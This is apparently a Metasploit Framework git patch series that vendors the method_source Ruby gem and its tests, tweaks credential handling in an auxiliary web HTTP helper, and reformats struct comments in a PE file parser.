self.valid_expression?(str) + if defined?(Rubinius::Melbourne19) && RUBY_VERSION =~ /^1\.9/ + Rubinius::Melbourne19.parse_string(str) + elsif defined?(Rubinius::Melbourne) + Rubinius::Melbourne.parse_string(str) + else + catch(:valid) { + eval("BEGIN{throw :valid}\n#{str}") + } + end + true + rescue SyntaxError + false + end + + # Helper method responsible for extracting method body. + # Defined here to avoid polluting `Method` class. + # @param [Array] source_location The array returned by Method#source_location + # @return [File] The opened source file + def self.source_helper(source_location) + return nil if !source_location.is_a?(Array) + + file_name, line = source_location + File.open(file_name) do |file| + (line - 1).times { file.readline } + + code = "" + loop do + val = file.readline + code << val + + return code if valid_expression?(code) + end + end + end + + # Helper method responsible for opening source file and buffering up + # the comments for a specified method. Defined here to avoid polluting + # `Method` class. + # @param [Array] source_location The array returned by Method#source_location + # @return [String] The comments up to the point of the method. + def self.comment_helper(source_location) + return nil if !source_location.is_a?(Array) + + file_name, line = source_location + File.open(file_name) do |file| + buffer = "" + (line - 1).times do + line = file.readline + # Add any line that is a valid ruby comment, + # but clear as soon as we hit a non comment line. + if (line =~ /^\s*#/) || (line =~ /^\s*$/) + buffer << line.lstrip + else + buffer.replace("") + end + end + + buffer + end + end + + # This module is to be included by `Method` and `UnboundMethod` and + # provides the `#source` functionality + module MethodExtensions + + # We use the included hook to patch Method#source on rubinius. + # We need to use the included hook as Rubinius defines a `source` + # on Method so including a module will have no effect (as it's + # higher up the MRO). + # @param [Class] klass The class that includes the module. + def self.included(klass) + if klass.method_defined?(:source) && Object.const_defined?(:RUBY_ENGINE) && + RUBY_ENGINE =~ /rbx/ + + klass.class_eval do + orig_source = instance_method(:source) + + define_method(:source) do + begin + super + rescue + orig_source.bind(self).call + end + end + + end + end + end + + # Return the sourcecode for the method as a string + # (This functionality is only supported in Ruby 1.9 and above) + # @return [String] The method sourcecode as a string + # @example + # Set.instance_method(:clear).source.display + # => + # def clear + # @hash.clear + # self + # end + def source + if respond_to?(:source_location) + source = MethodSource.source_helper(source_location) + + raise "Cannot locate source for this method: #{name}" if !source + else + raise "#{self.class}#source not supported by this Ruby version (#{RUBY_VERSION})" + end + + source + end + + # Return the comments associated with the method as a string. + # (This functionality is only supported in Ruby 1.9 and above) + # @return [String] The method's comments as a string + # @example + # Set.instance_method(:clear).comment.display + # => + # # Removes all elements and returns self. + def comment + if respond_to?(:source_location) + comment = MethodSource.comment_helper(source_location) + + raise "Cannot locate source for this method: #{name}" if !comment + else + raise "#{self.class}#comment not supported by this Ruby version (#{RUBY_VERSION})" + end + + comment + end + end +end + +class Method + include MethodSource::SourceLocation::MethodExtensions + include MethodSource::MethodExtensions +end + +class UnboundMethod + include MethodSource::SourceLocation::UnboundMethodExtensions + include MethodSource::MethodExtensions +end + +class Proc + include MethodSource::SourceLocation::ProcExtensions + include MethodSource::MethodExtensions +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb new file mode 100644 index 0000000000..9161854819 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb @@ -0,0 +1,138 @@ +module MethodSource + module ReeSourceLocation + # Ruby enterprise edition provides all the information that's + # needed, in a slightly different way. + def source_location + [__file__, __line__] rescue nil + end + end + + module SourceLocation + module MethodExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ + require 'java' + + # JRuby version source_location hack + # @return [Array] A two element array containing the source location of the method + def source_location + to_java.source_location(Thread.current.to_java.getContext()) + end + else + + + def trace_func(event, file, line, id, binding, classname) + return unless event == 'call' + set_trace_func nil + + @file, @line = file, line + raise :found + end + + private :trace_func + + # Return the source location of a method for Ruby 1.8. + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # method definition is found. + def source_location + if @file.nil? + args =[*(1..(arity<-1 ? -arity-1 : arity ))] + + set_trace_func method(:trace_func).to_proc + call(*args) rescue nil + set_trace_func nil + @file = File.expand_path(@file) if @file && File.exist?(File.expand_path(@file)) + end + return [@file, @line] if File.exist?(@file.to_s) + end + end + end + + module ProcExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ + + # Return the source location for a Proc (Rubinius only) + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # proc definition is found. + def source_location + [block.file.to_s, block.line] + end + else + + # Return the source location for a Proc (in implementations + # without Proc#source_location) + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # proc definition is found. + def source_location + self.to_s =~ /@(.*):(\d+)/ + [$1, $2.to_i] + end + end + end + + module UnboundMethodExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ + require 'java' + + # JRuby version source_location hack + # @return [Array] A two element array containing the source location of the method + def source_location + to_java.source_location(Thread.current.to_java.getContext()) + end + + else + + + # Return the source location of an instance method for Ruby 1.8. + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # method definition is found. + def source_location + klass = case owner + when Class + owner + when Module + method_owner = owner + Class.new { include(method_owner) } + end + + # deal with immediate values + case + when klass == Symbol + return :a.method(name).source_location + when klass == Fixnum + return 0.method(name).source_location + when klass == TrueClass + return true.method(name).source_location + when klass == FalseClass + return false.method(name).source_location + when klass == NilClass + return nil.method(name).source_location + end + + begin + Object.instance_method(:method).bind(klass.allocate).call(name).source_location + rescue TypeError + + # Assume we are dealing with a Singleton Class: + # 1. Get the instance object + # 2. Forward the source_location lookup to the instance + instance ||= ObjectSpace.each_object(owner).first + Object.instance_method(:method).bind(instance).call(name).source_location + end + end + end + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb new file mode 100644 index 0000000000..b8142bfaef --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb @@ -0,0 +1,3 @@ +module MethodSource + VERSION = "0.7.1" +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec new file mode 100644 index 0000000000..83a727d6f6 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec @@ -0,0 +1,33 @@ +# -*- encoding: utf-8 -*- + +Gem::Specification.new do |s| + s.name = "method_source" + s.version = "0.7.0" + + s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= + s.authors = ["John Mair (banisterfiend)"] + s.date = "2012-01-01" + s.description = "retrieve the sourcecode for a method" + s.email = "jrmair@gmail.com" + s.files = [".gemtest", ".travis.yml", ".yardopts", "Gemfile", "LICENSE", "README.markdown", "Rakefile", "lib/method_source.rb", "lib/method_source/source_location.rb", "lib/method_source/version.rb", "method_source.gemspec", "test/test.rb", "test/test_helper.rb"] + s.homepage = "http://banisterfiend.wordpress.com" + s.require_paths = ["lib"] + s.rubygems_version = "1.8.10" + s.summary = "retrieve the sourcecode for a method" + s.test_files = ["test/test.rb", "test/test_helper.rb"] + + if s.respond_to? :specification_version then + s.specification_version = 3 + + if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then + s.add_development_dependency(%q, ["~> 1.1.0"]) + s.add_development_dependency(%q, ["~> 0.9"]) + else + s.add_dependency(%q, ["~> 1.1.0"]) + s.add_dependency(%q, ["~> 0.9"]) + end + else + s.add_dependency(%q, ["~> 1.1.0"]) + s.add_dependency(%q, ["~> 0.9"]) + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb new file mode 100644 index 0000000000..425e56acf9 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb @@ -0,0 +1,122 @@ +direc = File.dirname(__FILE__) + +require 'rubygems' +require 'bacon' +require "#{direc}/../lib/method_source" +require "#{direc}/test_helper" + +describe MethodSource do + + describe "source_location (testing 1.8 implementation)" do + it 'should return correct source_location for a method' do + method(:hello).source_location.first.should =~ /test_helper/ + end + + it 'should not raise for immediate instance methods' do + [Symbol, Fixnum, TrueClass, FalseClass, NilClass].each do |immediate_class| + lambda { immediate_class.instance_method(:to_s).source_location }.should.not.raise + end + end + + it 'should not raise for immediate methods' do + [:a, 1, true, false, nil].each do |immediate| + lambda { immediate.method(:to_s).source_location }.should.not.raise + end + end + end + + before do + @hello_module_source = " def hello; :hello_module; end\n" + @hello_singleton_source = "def $o.hello; :hello_singleton; end\n" + @hello_source = "def hello; :hello; end\n" + @hello_comment = "# A comment for hello\n# It spans two lines and is indented by 2 spaces\n" + @lambda_comment = "# This is a comment for MyLambda\n" + @lambda_source = "MyLambda = lambda { :lambda }\n" + @proc_source = "MyProc = Proc.new { :proc }\n" + end + + it 'should define methods on Method and UnboundMethod and Proc' do + Method.method_defined?(:source).should == true + UnboundMethod.method_defined?(:source).should == true + Proc.method_defined?(:source).should == true + end + + describe "Methods" do + it 'should return source for method' do + method(:hello).source.should == @hello_source + end + + it 'should return source for a method defined in a module' do + M.instance_method(:hello).source.should == @hello_module_source + end + + it 'should return source for a singleton method as an instance method' do + class << $o; self; end.instance_method(:hello).source.should == @hello_singleton_source + end + + it 'should return source for a singleton method' do + $o.method(:hello).source.should == @hello_singleton_source + end + + + it 'should return a comment for method' do + method(:hello).comment.should == @hello_comment + end + + + if !is_rbx? + it 'should raise for C methods' do + lambda { method(:puts).source }.should.raise RuntimeError + end + end + end + + # if RUBY_VERSION =~ /1.9/ || is_rbx? + describe "Lambdas and Procs" do + it 'should return source for proc' do + MyProc.source.should == @proc_source + end + + it 'should return an empty string if there is no comment' do + MyProc.comment.should == '' + end + + it 'should return source for lambda' do + MyLambda.source.should == @lambda_source + end + + it 'should return comment for lambda' do + MyLambda.comment.should == @lambda_comment + end + end + # end + describe "Comment tests" do + before do + @comment1 = "# a\n# b\n" + @comment2 = "# a\n# b\n" + @comment3 = "# a\n#\n# b\n" + @comment4 = "# a\n# b\n" + @comment5 = "# a\n# b\n# c\n# d\n" + end + + it "should correctly extract multi-line comments" do + method(:comment_test1).comment.should == @comment1 + end + + it "should correctly strip leading whitespace before comments" do + method(:comment_test2).comment.should == @comment2 + end + + it "should keep empty comment lines" do + method(:comment_test3).comment.should == @comment3 + end + + it "should ignore blank lines between comments" do + method(:comment_test4).comment.should == @comment4 + end + + it "should align all comments to same indent level" do + method(:comment_test5).comment.should == @comment5 + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb new file mode 100644 index 0000000000..53da4e519c --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb @@ -0,0 +1,50 @@ +def is_rbx? + defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ +end + +def jruby? + defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ +end + + +module M + def hello; :hello_module; end +end + +$o = Object.new +def $o.hello; :hello_singleton; end + +# A comment for hello + + # It spans two lines and is indented by 2 spaces +def hello; :hello; end + +# a +# b +def comment_test1; end + + # a + # b +def comment_test2; end + +# a +# +# b +def comment_test3; end + +# a + +# b +def comment_test4; end + + +# a + # b + # c +# d +def comment_test5; end + +# This is a comment for MyLambda +MyLambda = lambda { :lambda } +MyProc = Proc.new { :proc } + diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 00ee6c1e5b..2ad3dbcb19 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -107,7 +107,6 @@ class Auxiliary::Web::HTTP {}, opts[:target].ssl, 'SSLv23', - nil, username, password ) @@ -300,8 +299,10 @@ class Auxiliary::Web::HTTP opts['data'] = body if body c = connect - c.username = username - c.password = password + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout ) rescue ::Timeout::Error Response.timed_out From f5c23e4b0208617b12aa1cfe633fd203d12d5664 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 5 Mar 2013 12:35:21 -0600 Subject: [PATCH 79/87] fix typo snaffu --- lib/msf/core/auxiliary/web/http.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 2ad3dbcb19..166370abbc 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -107,6 +107,7 @@ class Auxiliary::Web::HTTP {}, opts[:target].ssl, 'SSLv23', + nil, username, password ) From a64edb33c4742ff376eaf3fdcd8b35abe364e5d6 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 5 Mar 2013 14:34:11 -0600 Subject: [PATCH 80/87] Make code sections look right in docs --- lib/rex/peparsey/pebase.rb | 588 ++++++++++++++++++------------------- 1 file changed, 286 insertions(+), 302 deletions(-) diff --git a/lib/rex/peparsey/pebase.rb b/lib/rex/peparsey/pebase.rb index cb0af219e2..bf268e6b36 100644 --- a/lib/rex/peparsey/pebase.rb +++ b/lib/rex/peparsey/pebase.rb @@ -12,34 +12,31 @@ class PeBase # #define IMAGE_DOS_SIGNATURE 0x5A4D // MZ - IMAGE_DOS_SIGNATURE = 0x5a4d - # - # typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header - # WORD e_magic; // Magic number - # WORD e_cblp; // Bytes on last page of file - # WORD e_cp; // Pages in file - # WORD e_crlc; // Relocations - # WORD e_cparhdr; // Size of header in paragraphs - # WORD e_minalloc; // Minimum extra paragraphs needed - # WORD e_maxalloc; // Maximum extra paragraphs needed - # WORD e_ss; // Initial (relative) SS value - # WORD e_sp; // Initial SP value - # WORD e_csum; // Checksum - # WORD e_ip; // Initial IP value - # WORD e_cs; // Initial (relative) CS value - # WORD e_lfarlc; // File address of relocation table - # WORD e_ovno; // Overlay number - # WORD e_res[4]; // Reserved words - # WORD e_oemid; // OEM identifier (for e_oeminfo) - # WORD e_oeminfo; // OEM information; e_oemid specific - # WORD e_res2[10]; // Reserved words - # LONG e_lfanew; // File address of new exe header - # } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER; - # - IMAGE_DOS_HEADER_SIZE = 64 + # Struct + # typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header + # WORD e_magic; // Magic number + # WORD e_cblp; // Bytes on last page of file + # WORD e_cp; // Pages in file + # WORD e_crlc; // Relocations + # WORD e_cparhdr; // Size of header in paragraphs + # WORD e_minalloc; // Minimum extra paragraphs needed + # WORD e_maxalloc; // Maximum extra paragraphs needed + # WORD e_ss; // Initial (relative) SS value + # WORD e_sp; // Initial SP value + # WORD e_csum; // Checksum + # WORD e_ip; // Initial IP value + # WORD e_cs; // Initial (relative) CS value + # WORD e_lfarlc; // File address of relocation table + # WORD e_ovno; // Overlay number + # WORD e_res[4]; // Reserved words + # WORD e_oemid; // OEM identifier (for e_oeminfo) + # WORD e_oeminfo; // OEM information; e_oemid specific + # WORD e_res2[10]; // Reserved words + # LONG e_lfanew; // File address of new exe header + # } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER; IMAGE_DOS_HEADER = Rex::Struct2::CStructTemplate.new( [ 'uint16v', 'e_magic', IMAGE_DOS_SIGNATURE ], [ 'uint16v', 'e_cblp', 0 ], @@ -142,31 +139,29 @@ class PeBase return DosHeader.new(rawdata) end - # - # typedef struct _IMAGE_FILE_HEADER { - # WORD Machine; - # WORD NumberOfSections; - # DWORD TimeDateStamp; - # DWORD PointerToSymbolTable; - # DWORD NumberOfSymbols; - # WORD SizeOfOptionalHeader; - # WORD Characteristics; - # } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER; - # # #define IMAGE_NT_SIGNATURE 0x00004550 // PE00 - # #define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386. - # #define IMAGE_FILE_MACHINE_IA64 0x0200 // Intel 64 - # #define IMAGE_FILE_MACHINE_ALPHA64 0x0284 // ALPHA64 - # #define IMAGE_FILE_MACHINE_AMD64 0x8664 // AMD64 (K8) - # #define IMAGE_SIZEOF_FILE_HEADER 20 - # - IMAGE_NT_SIGNATURE = 0x00004550 + # #define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386. IMAGE_FILE_MACHINE_I386 = 0x014c + # #define IMAGE_FILE_MACHINE_IA64 0x0200 // Intel 64 IMAGE_FILE_MACHINE_IA64 = 0x0200 + # #define IMAGE_FILE_MACHINE_ALPHA64 0x0284 // ALPHA64 IMAGE_FILE_MACHINE_ALPHA64 = 0x0284 + # #define IMAGE_FILE_MACHINE_AMD64 0x8664 // AMD64 (K8) IMAGE_FILE_MACHINE_AMD64 = 0x8664 + # #define IMAGE_SIZEOF_FILE_HEADER 20 IMAGE_FILE_HEADER_SIZE = 20+4 # because we include the signature + + # C struct defining the PE file header + # typedef struct _IMAGE_FILE_HEADER { + # WORD Machine; + # WORD NumberOfSections; + # DWORD TimeDateStamp; + # DWORD PointerToSymbolTable; + # DWORD NumberOfSymbols; + # WORD SizeOfOptionalHeader; + # WORD Characteristics; + # } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER; IMAGE_FILE_HEADER = Rex::Struct2::CStructTemplate.new( # not really in the header, but easier for us this way [ 'uint32v', 'NtSignature', 0 ], @@ -222,24 +217,23 @@ class PeBase return FileHeader.new(rawdata) end - # - # typedef struct _IMAGE_IMPORT_DESCRIPTOR { - # union { - # DWORD Characteristics; // 0 for terminating null import descriptor - # DWORD OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA) - # }; - # DWORD TimeDateStamp; // 0 if not bound, - # // -1 if bound, and real date\time stamp - # // in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND) - # // O.W. date/time stamp of DLL bound to (Old BIND) - # - # DWORD ForwarderChain; // -1 if no forwarders - # DWORD Name; - # DWORD FirstThunk; // RVA to IAT (if bound this IAT has actual addresses) - # } IMAGE_IMPORT_DESCRIPTOR; - # IMAGE_ORDINAL_FLAG32 = 0x80000000 IMAGE_IMPORT_DESCRIPTOR_SIZE = 20 + # Struct + # typedef struct _IMAGE_IMPORT_DESCRIPTOR { + # union { + # DWORD Characteristics; // 0 for terminating null import descriptor + # DWORD OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA) + # }; + # DWORD TimeDateStamp; // 0 if not bound, + # // -1 if bound, and real date\time stamp + # // in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND) + # // O.W. date/time stamp of DLL bound to (Old BIND) + # + # DWORD ForwarderChain; // -1 if no forwarders + # DWORD Name; + # DWORD FirstThunk; // RVA to IAT (if bound this IAT has actual addresses) + # } IMAGE_IMPORT_DESCRIPTOR; IMAGE_IMPORT_DESCRIPTOR = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'OriginalFirstThunk', 0 ], [ 'uint32v', 'TimeDateStamp', 0 ], @@ -248,11 +242,10 @@ class PeBase [ 'uint32v', 'FirstThunk', 0 ] ) - # - # typedef struct _IMAGE_IMPORT_BY_NAME { - # WORD Hint; - # BYTE Name[1]; - # } IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME; + # typedef struct _IMAGE_IMPORT_BY_NAME { + # WORD Hint; + # BYTE Name[1]; + # } IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME; # class ImportDescriptor @@ -271,22 +264,22 @@ class PeBase end end - # - # typedef struct _IMAGE_EXPORT_DIRECTORY { - # DWORD Characteristics; - # DWORD TimeDateStamp; - # WORD MajorVersion; - # WORD MinorVersion; - # DWORD Name; - # DWORD Base; - # DWORD NumberOfFunctions; - # DWORD NumberOfNames; - # DWORD AddressOfFunctions; // RVA from base of image - # DWORD AddressOfNames; // RVA from base of image - # DWORD AddressOfNameOrdinals; // RVA from base of image - # } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY; - # + # sizeof(struct _IMAGE_EXPORT_DESCRIPTOR) IMAGE_EXPORT_DESCRIPTOR_SIZE = 40 + # Struct defining the export table + # typedef struct _IMAGE_EXPORT_DIRECTORY { + # DWORD Characteristics; + # DWORD TimeDateStamp; + # WORD MajorVersion; + # WORD MinorVersion; + # DWORD Name; + # DWORD Base; + # DWORD NumberOfFunctions; + # DWORD NumberOfNames; + # DWORD AddressOfFunctions; // RVA from base of image + # DWORD AddressOfNames; // RVA from base of image + # DWORD AddressOfNameOrdinals; // RVA from base of image + # } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY; IMAGE_EXPORT_DESCRIPTOR = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'Characteristics', 0 ], [ 'uint32v', 'TimeDateStamp', 0 ], @@ -320,12 +313,6 @@ class PeBase end end - # - # typedef struct _IMAGE_DATA_DIRECTORY { - # DWORD VirtualAddress; - # DWORD Size; - # } IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY; - # IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16 IMAGE_DATA_DIRECTORY_SIZE = 8 IMAGE_DIRECTORY_ENTRY_EXPORT = 0 @@ -344,57 +331,62 @@ class PeBase IMAGE_DIRECTORY_ENTRY_IAT = 12 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT = 13 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14 + # Struct + # typedef struct _IMAGE_DATA_DIRECTORY { + # DWORD VirtualAddress; + # DWORD Size; + # } IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY; IMAGE_DATA_DIRECTORY = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'VirtualAddress', 0 ], [ 'uint32v', 'Size', 0 ] ) + # Struct + # typedef struct _IMAGE_OPTIONAL_HEADER { + # // + # // Standard fields. + # // # - # typedef struct _IMAGE_OPTIONAL_HEADER { - # // - # // Standard fields. - # // + # WORD Magic; + # BYTE MajorLinkerVersion; + # BYTE MinorLinkerVersion; + # DWORD SizeOfCode; + # DWORD SizeOfInitializedData; + # DWORD SizeOfUninitializedData; + # DWORD AddressOfEntryPoint; + # DWORD BaseOfCode; + # DWORD BaseOfData; # - # WORD Magic; - # BYTE MajorLinkerVersion; - # BYTE MinorLinkerVersion; - # DWORD SizeOfCode; - # DWORD SizeOfInitializedData; - # DWORD SizeOfUninitializedData; - # DWORD AddressOfEntryPoint; - # DWORD BaseOfCode; - # DWORD BaseOfData; + # // + # // NT additional fields. + # // # - # // - # // NT additional fields. - # // + # DWORD ImageBase; + # DWORD SectionAlignment; + # DWORD FileAlignment; + # WORD MajorOperatingSystemVersion; + # WORD MinorOperatingSystemVersion; + # WORD MajorImageVersion; + # WORD MinorImageVersion; + # WORD MajorSubsystemVersion; + # WORD MinorSubsystemVersion; + # DWORD Win32VersionValue; + # DWORD SizeOfImage; + # DWORD SizeOfHeaders; + # DWORD CheckSum; + # WORD Subsystem; + # WORD DllCharacteristics; + # DWORD SizeOfStackReserve; + # DWORD SizeOfStackCommit; + # DWORD SizeOfHeapReserve; + # DWORD SizeOfHeapCommit; + # DWORD LoaderFlags; + # DWORD NumberOfRvaAndSizes; + # IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; + # } IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32; # - # DWORD ImageBase; - # DWORD SectionAlignment; - # DWORD FileAlignment; - # WORD MajorOperatingSystemVersion; - # WORD MinorOperatingSystemVersion; - # WORD MajorImageVersion; - # WORD MinorImageVersion; - # WORD MajorSubsystemVersion; - # WORD MinorSubsystemVersion; - # DWORD Win32VersionValue; - # DWORD SizeOfImage; - # DWORD SizeOfHeaders; - # DWORD CheckSum; - # WORD Subsystem; - # WORD DllCharacteristics; - # DWORD SizeOfStackReserve; - # DWORD SizeOfStackCommit; - # DWORD SizeOfHeapReserve; - # DWORD SizeOfHeapCommit; - # DWORD LoaderFlags; - # DWORD NumberOfRvaAndSizes; - # IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; - # } IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32; - # - # #define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10b - # #define IMAGE_SIZEOF_NT_OPTIONAL32_HEADER 224 + # #define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10b + # #define IMAGE_SIZEOF_NT_OPTIONAL32_HEADER 224 # IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10b @@ -450,46 +442,44 @@ class PeBase )] ) - # - # typedef struct _IMAGE_OPTIONAL_HEADER64 { - # USHORT Magic; - # UCHAR MajorLinkerVersion; - # UCHAR MinorLinkerVersion; - # ULONG SizeOfCode; - # ULONG SizeOfInitializedData; - # ULONG SizeOfUninitializedData; - # ULONG AddressOfEntryPoint; - # ULONG BaseOfCode; - # ULONGLONG ImageBase; - # ULONG SectionAlignment; - # ULONG FileAlignment; - # USHORT MajorOperatingSystemVersion; - # USHORT MinorOperatingSystemVersion; - # USHORT MajorImageVersion; - # USHORT MinorImageVersion; - # USHORT MajorSubsystemVersion; - # USHORT MinorSubsystemVersion; - # ULONG Win32VersionValue; - # ULONG SizeOfImage; - # ULONG SizeOfHeaders; - # ULONG CheckSum; - # USHORT Subsystem; - # USHORT DllCharacteristics; - # ULONGLONG SizeOfStackReserve; - # ULONGLONG SizeOfStackCommit; - # ULONGLONG SizeOfHeapReserve; - # ULONGLONG SizeOfHeapCommit; - # ULONG LoaderFlags; - # ULONG NumberOfRvaAndSizes; - # IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; - # } IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64; - # - # #define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b # #define IMAGE_SIZEOF_NT_OPTIONAL64_HEADER 240 - # - IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20b + # #define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b IMAGE_SIZEOF_NT_OPTIONAL64_HEADER = 240 + + # Struct + # typedef struct _IMAGE_OPTIONAL_HEADER64 { + # USHORT Magic; + # UCHAR MajorLinkerVersion; + # UCHAR MinorLinkerVersion; + # ULONG SizeOfCode; + # ULONG SizeOfInitializedData; + # ULONG SizeOfUninitializedData; + # ULONG AddressOfEntryPoint; + # ULONG BaseOfCode; + # ULONGLONG ImageBase; + # ULONG SectionAlignment; + # ULONG FileAlignment; + # USHORT MajorOperatingSystemVersion; + # USHORT MinorOperatingSystemVersion; + # USHORT MajorImageVersion; + # USHORT MinorImageVersion; + # USHORT MajorSubsystemVersion; + # USHORT MinorSubsystemVersion; + # ULONG Win32VersionValue; + # ULONG SizeOfImage; + # ULONG SizeOfHeaders; + # ULONG CheckSum; + # USHORT Subsystem; + # USHORT DllCharacteristics; + # ULONGLONG SizeOfStackReserve; + # ULONGLONG SizeOfStackCommit; + # ULONGLONG SizeOfHeapReserve; + # ULONGLONG SizeOfHeapCommit; + # ULONG LoaderFlags; + # ULONG NumberOfRvaAndSizes; + # IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; + # } IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64; IMAGE_OPTIONAL_HEADER64 = Rex::Struct2::CStructTemplate.new( [ 'uint16v', 'Magic', 0 ], [ 'uint8', 'MajorLinkerVersion', 0 ], @@ -601,27 +591,24 @@ class PeBase end - # - # typedef struct _IMAGE_SECTION_HEADER { - # BYTE Name[IMAGE_SIZEOF_SHORT_NAME]; - # union { - # DWORD PhysicalAddress; - # DWORD VirtualSize; - # } Misc; - # DWORD VirtualAddress; - # DWORD SizeOfRawData; - # DWORD PointerToRawData; - # DWORD PointerToRelocations; - # DWORD PointerToLinenumbers; - # WORD NumberOfRelocations; - # WORD NumberOfLinenumbers; - # DWORD Characteristics; - # } IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER; - # # #define IMAGE_SIZEOF_SECTION_HEADER 40 - # - IMAGE_SIZEOF_SECTION_HEADER = 40 + # Struct + # typedef struct _IMAGE_SECTION_HEADER { + # BYTE Name[IMAGE_SIZEOF_SHORT_NAME]; + # union { + # DWORD PhysicalAddress; + # DWORD VirtualSize; + # } Misc; + # DWORD VirtualAddress; + # DWORD SizeOfRawData; + # DWORD PointerToRawData; + # DWORD PointerToRelocations; + # DWORD PointerToLinenumbers; + # WORD NumberOfRelocations; + # WORD NumberOfLinenumbers; + # DWORD Characteristics; + # } IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER; IMAGE_SECTION_HEADER = Rex::Struct2::CStructTemplate.new( [ 'string', 'Name', 8, '' ], [ 'uint32v', 'Misc', 0 ], @@ -669,17 +656,16 @@ class PeBase return section_headers end - # - # typedef struct _IMAGE_BASE_RELOCATION { - # DWORD VirtualAddress; - # DWORD SizeOfBlock; - # // WORD TypeOffset[1]; - # } IMAGE_BASE_RELOCATION; - # typedef IMAGE_BASE_RELOCATION UNALIGNED * PIMAGE_BASE_RELOCATION; - # 